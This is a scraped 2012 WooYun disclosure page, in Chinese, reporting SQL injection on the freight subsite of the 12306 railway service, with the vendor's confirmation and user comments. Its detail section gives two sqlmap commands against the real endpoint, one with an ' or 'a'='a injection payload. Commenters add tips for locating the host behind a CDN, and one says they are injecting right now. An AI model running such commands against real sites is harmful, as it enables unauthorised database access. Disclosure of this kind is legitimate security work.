12306货运分站注入漏洞 | wooyun-2012-012517| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-012517

漏洞标题：12306货运分站注入漏洞

漏洞作者：路人甲

提交时间：2012-09-21 15:15

修复时间：2012-11-05 15:16

公开时间：2012-11-05 15:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-09-21：细节已通知厂商并且等待厂商处理中
2012-09-21：厂商已经确认，细节仅向厂商公开
2012-10-01：细节向核心白帽子及相关领域专家公开
2012-10-11：细节向普通白帽子公开
2012-10-21：细节向实习白帽子公开
2012-11-05：细节向公众公开

简要描述：

hyfw.12306.cn域下存在注入漏洞。

详细说明：

./sqlmap.py -u 'http://hyfw.12306.cn/hyinfo/action/FwcszsAction_hyblzxx' --data "LJDM=' or 'a'='a&dz2=&hzzm=&sheng=黑&lxs=0&PageUpperBound=10&PageLowerBound=0&Pagenum=1" -p LJDM

或者

./sqlmap.py -u 'http://hyfw.12306.cn/hyinfo/action/FwcszsAction_hyblzxx' --data 'LJDM=&dz2=&hzzm=&sheng=黑&lxs=0&PageUpperBound=10&PageLowerBound=0&Pagenum=1' -p sheng

漏洞证明：

修复方案：

过滤....

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2012-09-21 17:59

厂商回复：

确认漏洞，正在处理中，谢谢！

漏洞评价：

2012-09-21 15:40 | 灵惜 ( 路人 | Rank:14 漏洞数:2 | 哇咔咔，搞定它)

一帮大黑阔~ HTTP 错误 403（Forbidden）你们这么搞，上面头头屁事没有，只有苦逼的程序快疯了~
2012-09-21 15:53 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@灵惜教你一招,在搜索引擎上输入:site:hyfw.12306.cn
2012-09-21 16:00 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@灵惜 @洞主不止这一个域名。。目测多个域名都可能存在相同的问题。。网站架构模板都完全一样
2012-09-21 16:27 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

@蟋蟀哥哥该网页拒绝访问您无权访问网址为 http://hyfw.12306.cn/ 的网页。您可能需要登录。HTTP 错误 403（Forbidden）：服务器拒绝执行该请求。
2012-09-21 16:27 | 瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )

表这样.....让他们有时间去修理12306订票系统吧....啊啊啊啊啊，买票困难死了...
2012-09-21 16:27 | neal ( 普通白帽子 | Rank:219 漏洞数:23 )

是不是你们的检测让我们买票更加的艰难了？
2012-09-21 16:31 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@neal 教你一招,在搜索引擎上输入:site:hyfw.12306.cn。。。真实的地址就出来了
2012-09-21 17:32 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@蟋蟀哥哥这样可以突破cdn?
2012-09-21 23:24 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@xsser 哪样???注入有可能突破cdn而已
2012-09-21 23:27 | xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

@蟋蟀哥哥你不是site的么
2012-09-22 09:45 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

@xsser site是查看搜索引擎索引该子域的页面啊..cdn也可以给子域加上的。。而且子域和主域很可能不是一个机房的
2012-09-22 10:28 | Vty ( 普通白帽子 | Rank:199 漏洞数:37 )

表示，正在注入中>>>>>>>>>>>>>>>>>>>>>>>>>>
2012-09-24 12:56 | Master ( 路人 | Rank:29 漏洞数:10 )

话说 12306花了一个亿的资金，建设的网站，多多检测检测是好的
2012-09-28 10:19 | 無情 ( 实习白帽子 | Rank:41 漏洞数:5 | 根据相关法律法规和政策，此信息未予显示。)

都是在帮人家赚1.99E。。。。。破系统，，大家帮他修复找洞。。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-012517

漏洞标题：12306货运分站注入漏洞

相关厂商：中国铁道科学研究院

漏洞作者：路人甲

提交时间：2012-09-21 15:15

修复时间：2012-11-05 15:16

公开时间：2012-11-05 15:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-012517

漏洞标题：12306货运分站注入漏洞

相关厂商：中国铁道科学研究院

漏洞作者： 路人甲

提交时间：2012-09-21 15:15

修复时间：2012-11-05 15:16

公开时间：2012-11-05 15:16

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2012-012517"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云